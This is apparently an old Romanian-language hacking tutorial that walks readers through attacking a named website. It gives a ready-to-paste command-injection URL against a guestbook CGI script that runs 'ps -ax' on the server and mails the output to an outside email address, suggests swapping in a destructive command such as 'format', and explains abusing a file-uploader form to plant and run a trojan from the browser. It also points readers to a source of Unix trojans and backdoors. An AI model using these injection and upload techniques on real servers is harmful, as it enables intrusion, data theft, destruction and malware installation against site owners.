Citeste toata pagina,help-ul este la sfarsit!
NOTE: Browserul trebuie sa suporte incarcarea.
Daca nu poti sa spargi site-ul,atunci blocheaza-l.
Vezi daca acel site
contine cgi-bin/perl.exe apoi introdu numele site-ului in caseta de mai
jos
si apasa enter.Site-ul asta are perl.exe.
Am mai gasit un exploit!:
Acest exploit executa comanda unix "ps -ax" si trimite rezultatul la
bebe2000@home.ro
http://www.andre.ro/cgi-bin/gbook/gbook.cgi?
_MAILTO=oops;ps%20-ax|mail%20 bebe2000@home.ro&
_POSTIT=yes&
_NEWONTOP=yes&
_SHOWEMAIL=yes&
_SHOWURL=yes&
_SHOWCOMMENT=yes&
_SHOWFROM=no&
_NAME=bebe2000&
_EMAIL= bebe2000@home.ro.&
_URL=http://www.andre.ro&
_COMMENT=few&
_FROM=few
Evident toata comanda de sus trebuie sa fie pe o singura linie in browser!
Baga si tu o comanda adevarata in loc de "px -ax" (format) nu stiu daca merge sub unix.
bebe2000 nu merge dimineata!!Inlocuieste bebe2000@home.ro cu o adresa pe hotmail.
Cand vezi sursa paginii uite-te la formular si o sa vezi ceva de
genul:
<..METHOD=POST
ACTION="http://www.andre.ro/cgi-win/uploader.exe/Uploads/">
Uploads este
diectorul unde vei incarca tu fisierele,eventual index.html,dar eu nu am
de
unde sa stiu ca acest director este chiar directorul unde au ele paginile
de web publicate.
Schimba uploads cu
cgi-win:
ACTION="http://www.andre.ro/cgi-win/uploader.exe/cgi-win/"
Apoi
incarca cu ajutorul formulaului meu un troian pe care il executi din
browser:
http://www.andre.ro/cgi-win/server.exe?/
Daca sistemul de operare
este Unix atunci server.exe nu ruleaza,gaseste un exploit pentru
Unix si
ruleaza-l din browser.Pe astalavista gasesti troieni si backdoor-uri
Unix.
Cele mai adevarate sunt scripturile cu extensia sh.
Distractie
placuta!